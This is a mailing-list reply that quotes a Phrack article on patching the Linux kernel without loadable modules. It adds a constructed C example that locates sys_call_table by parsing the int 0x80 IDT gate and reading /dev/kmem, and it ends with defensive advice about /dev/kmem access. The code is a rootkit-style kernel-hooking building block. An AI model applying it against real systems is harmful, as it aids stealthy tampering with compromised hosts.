
Re: Kernel security advice



Quoting campbellm@cia.com.au (campbellm@cia.com.au):

> I like using non-modular kernels to prevent LKMs

http://www.phrack.org/phrack/58/p58-0x07

  In this paper, we will discuss ways of abusing the Linux kernel
  (syscalls mostly) without the help of module support or System.map at all,
  so we assume that the reader has a clue about what an LKM is,
  how an LKM is loaded into the kernel etc. If you are not sure, look at some
  documentation (paragraph 6. [1], [2], [3])

  Imagine a scenario of a poor man who needs to change some interesting
  Linux syscall and LKM support is not compiled in. Imagine he has got a
  box, he got root, but the admin is so paranoid and he (or tripwire) doesn't
  like the poor man's patched sshd, and that box does not have the gcc/lib/.h
  needed for compiling his favourite LKM rootkit. So there are
  some solutions, step by step and, as an appendix, a full-featured
  linux-ia32 rootkit, an example/tool, which implements all the techniques
  described here.  [...]
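
The point of the paper for the "non-modular kernel" argument is that module
support is not needed to patch the running kernel: with root and /dev/kmem,
the attacker reads the IDT gate for int 0x80, follows it to the system_call
handler and scans that handler for `call *sys_call_table(,%eax,4)`, whose
ia32 encoding is FF 14 85 followed by the 32-bit table address. Below is an
added example in that spirit. It is not code from the post or from the Phrack
article; the IDT bytes, handler bytes and addresses are constructed to look
like a 2.4-era 32-bit kernel, and the read_kmem helper assumes /dev/kmem
exists and is readable by root (it has been removed from Linux since 5.13 and
was already restricted by CONFIG_STRICT_DEVMEM before that).

```c
/* Added example, not part of the original post or the Phrack article.
 * Reproduces in miniature the article's method for finding sys_call_table
 * on 32-bit x86 Linux without LKM support or System.map. */
#define _FILE_OFFSET_BITS 64
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

/* 32-bit IDT gate descriptor: offset[15:0] at bytes 0-1, segment selector
 * at bytes 2-3, reserved byte 4, type/attributes byte 5, offset[31:16] at
 * bytes 6-7. The handler address is the concatenated offset. */
uint32_t idt_gate_handler(const uint8_t gate[8])
{
    uint32_t lo = (uint32_t)gate[0] | ((uint32_t)gate[1] << 8);
    uint32_t hi = (uint32_t)gate[6] | ((uint32_t)gate[7] << 8);
    return (hi << 16) | lo;
}

/* Scan handler code for FF 14 85 disp32 (call *disp32(,%eax,4)) and return
 * disp32, i.e. the address of sys_call_table. Returns 0 if not found. */
uint32_t find_sys_call_table(const uint8_t *code, size_t len)
{
    static const uint8_t pat[3] = { 0xff, 0x14, 0x85 };
    for (size_t i = 0; i + 7 <= len; i++) {
        if (memcmp(code + i, pat, 3) == 0) {
            return (uint32_t)code[i + 3]
                 | ((uint32_t)code[i + 4] << 8)
                 | ((uint32_t)code[i + 5] << 16)
                 | ((uint32_t)code[i + 6] << 24);
        }
    }
    return 0;
}

/* How the article's tool obtains the bytes on a live box: /dev/kmem is
 * addressed by kernel virtual address. Assumes the device exists; returns
 * -1 otherwise, so the constructed demo below still runs without it. */
int read_kmem(uint32_t addr, void *buf, size_t n)
{
    int fd = open("/dev/kmem", O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t got = pread(fd, buf, n, (off_t)addr);
    close(fd);
    return got == (ssize_t)n ? 0 : -1;
}

/* Constructed sample: IDT entry 0x80 as a DPL-3 32-bit trap gate (0xef)
 * pointing at a hypothetical system_call at 0xc0106c60. */
static const uint8_t sample_gate[8] = {
    0x60, 0x6c,   /* offset low  = 0x6c60 */
    0x10, 0x00,   /* selector    = __KERNEL_CS */
    0x00, 0xef,   /* reserved; present, DPL 3, 32-bit trap gate */
    0x10, 0xc0    /* offset high = 0xc010 */
};

/* Constructed sample: a system_call prologue with the dispatch call. */
static const uint8_t sample_handler[] = {
    0x50, 0xfc, 0x06, 0x1e, 0x50,           /* push %eax; cld; push %es/%ds/%eax */
    0x55, 0x57, 0x56, 0x52, 0x51, 0x53,     /* push %ebp,%edi,%esi,%edx,%ecx,%ebx */
    0x3d, 0x00, 0x01, 0x00, 0x00,           /* cmp $0x100,%eax  (NR_syscalls) */
    0x73, 0x07,                             /* jae badsys */
    0xff, 0x14, 0x85, 0x30, 0x2c, 0x30, 0xc0, /* call *0xc0302c30(,%eax,4) */
    0x89, 0x44, 0x24, 0x18                  /* mov %eax,0x18(%esp) */
};

int main(void)
{
    uint32_t handler = idt_gate_handler(sample_gate);
    uint32_t table = find_sys_call_table(sample_handler, sizeof sample_handler);
    printf("int 0x80 handler: 0x%08x\n", handler);   /* 0xc0106c60 */
    printf("sys_call_table:   0x%08x\n", table);     /* 0xc0302c30 */
    return table ? 0 : 1;
}
```

On a real target the gate would come from the IDT base reported by `sidt`
and both the gate and the handler bytes from read_kmem; the parsing is the
same. The practitioner's takeaway is that this is what a non-modular kernel
does not stop, so the check that matters is whether /dev/kmem and /dev/mem
are reachable at all, not whether CONFIG_MODULES is off.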


